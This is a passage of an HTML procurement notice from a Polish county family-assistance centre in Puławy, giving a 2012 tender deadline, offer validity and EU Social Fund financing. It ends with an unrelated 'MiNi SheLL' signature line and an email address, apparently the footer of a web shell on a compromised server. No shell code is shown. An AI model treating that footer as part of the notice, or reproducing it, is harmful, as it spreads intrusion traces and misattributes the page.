f)zmianie osób przy pomocy których Wykonawca realizować będzie zamówienie, z zastrzeżeniem, że proponowane przez Wykonawcę osoby będą spełniały warunki określone w SIWZ;  zmiana taka nie wymaga aneksu do umowy;</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.efs-pcpr.pulawy.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowe Centrum Pomocy Rodzinie
al. Królewska 3 24-100 Puławy.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.07.2012 godzina 10:30, miejsce: Powiatowe Centrum Pomocy Rodzinie
al. Królewska 3 24-100 Puławy
sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 60 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt realizowany przez Powiatowe Centrum Pomocy Rodzinie w Puławach, współfinansowany ze środków
Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet VII Promocja
Integracji Społecznej, Działanie 7.1 Rozwój i upowszechnianie aktywnej integracji, Poddziałanie 7.1.2 Rozwój i
upowszechnianie aktywnej integracji przez powiatowe centra pomocy rodzinie..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com